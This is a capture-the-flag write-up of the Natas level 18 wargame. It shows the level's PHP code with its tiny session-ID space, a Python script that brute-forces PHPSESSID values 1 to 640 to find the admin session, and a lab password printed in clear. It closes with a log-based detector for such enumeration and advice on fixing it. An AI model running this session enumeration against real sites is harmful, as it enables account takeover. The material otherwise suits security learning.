Challenge:
This time we see a real login screen, requesting a username and password. We can also see the source code again; it is shown below. Some remarks I found in the code:

  • Return 1 is used for an admin login, but this function is disabled.
  • Return 0 is used if not logged in as admin.
  • I also see something with cookies and 1 being returned as admin.
  • The maxid for sessions is only 640 because this will be enough for the users. This kinda alarms me.

<?php
$maxid = 640; // 640 should be enough for everyone

function isValidAdminLogin() { /* {{{ */
    if($_REQUEST["username"] == "admin") {
    /* This method of authentication appears to be unsafe and has been disabled for now. */
        //return 1;
    }

    return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
    return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
    global $maxid;
    return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function my_session_start() { /* {{{ */
    if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
    if(!session_start()) {
        debug("Session start failed");
        return false;
    } else {
        debug("Session start ok");
        if(!array_key_exists("admin", $_SESSION)) {
        debug("Session was old: admin flag set");
        $_SESSION["admin"] = 0; // backwards compatible, secure
        }
        return true;
    }
    }

    return false;
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas19\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}
/* }}} */

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
    session_id(createID($_REQUEST["username"]));
    session_start();
    $_SESSION["admin"] = isValidAdminLogin();
    debug("New session started");
    $showform = false;
    print_credentials();
    }
} 

if($showform) {
?>

<p>
Please login with your admin account to retrieve credentials for natas19.
</p>

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form> 

After looking through the code and trying several things that failed, like setting an admin cookie, I looked into session ID brute forcing on OWASP. It is possible that we need to try all 640 session IDs. Let's try to make a Python script for this. I came up with the following, which worked. It took me some trial and error since I'm just learning Python.

import requests

url = "http://natas18.natas.labs.overthewire.org/"
auth_username = "natas18"
auth_password = "xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP"
# Text the page prints for a non-admin session; when it is missing we have hit the admin session.
user_str = "You are logged in as a regular user."

# createID() only returns rand(1, $maxid) with $maxid = 640, so every possible
# PHPSESSID value can simply be tried in order.
for i in range(1, 641):
    cookies = dict(PHPSESSID=str(i))
    r = requests.get(url, auth=(auth_username, auth_password), cookies=cookies)
    if user_str in r.text:
        print("Attempt ", i, " is not admin!")
    else:
        print("Attempt ", i, " IS ADMIN!")
        print(r.text)
        break

After running it I got the following output:

Attempt  108  is not admin!
Attempt  109  is not admin!
Attempt  110  is not admin!
Attempt  111  is not admin!
Attempt  112  is not admin!
Attempt  113  is not admin!
Attempt  114  is not admin!
Attempt  115  is not admin!
Attempt  116  is not admin!
Attempt  117  is not admin!
Attempt  118  is not admin!
Attempt  119  IS ADMIN!

So 119 is the admin session. Let's go to our browser, change the PHPSESSID cookie to 119 and refresh the page. We got access to level 19!
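From the defender's side, the script above leaves an obvious trace: one client presenting many different PHPSESSID values in a short time, which a real browser never does. The following is an added example (not part of the original writeup or the Natas code) that flags that pattern over constructed log lines; the log format, the window of 60 seconds and the threshold of 3 distinct IDs are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines (not from the page): client address, timestamp,
# request, status and the PHPSESSID cookie the client presented.
SAMPLE_LOG = """\
10.0.0.5 [03/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 "PHPSESSID=117"
10.0.0.5 [03/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 "PHPSESSID=118"
10.0.0.5 [03/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 "PHPSESSID=119"
10.0.0.5 [03/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 "PHPSESSID=120"
10.0.0.9 [03/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 "PHPSESSID=42"
10.0.0.9 [03/Jan/2024:10:05:03 +0000] "GET / HTTP/1.1" 200 "PHPSESSID=42"
"""

# Assumed log layout; adjust the pattern to the server's real LogFormat.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "[^"]*" \d+ "PHPSESSID=(?P<sid>[^"]*)"$'
)

def parse_line(line):
    """Return (ip, timestamp, session id) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("sid")

def find_session_enumeration(log_text, window_seconds=60, max_distinct=3):
    """Return {ip: distinct_sid_count} for clients that presented more than
    max_distinct different PHPSESSID values inside any window_seconds span.
    A legitimate client keeps one session cookie; cycling through many is the
    signature of guessing a tiny ID space such as rand(1, 640)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ip, ts, sid = parsed
            events[ip].append((ts, sid))
    flagged = {}
    for ip, seen in events.items():
        seen.sort()
        start = 0
        for end in range(len(seen)):  # sliding window over this client's requests
            while (seen[end][0] - seen[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {sid for _, sid in seen[start:end + 1]}
            if len(distinct) > max_distinct:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct))
    return flagged
```

The real fix is on the server: let PHP generate its own high-entropy session IDs instead of rand(1, 640), and enable session.use_strict_mode so an unknown client-supplied PHPSESSID is rejected rather than adopted.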
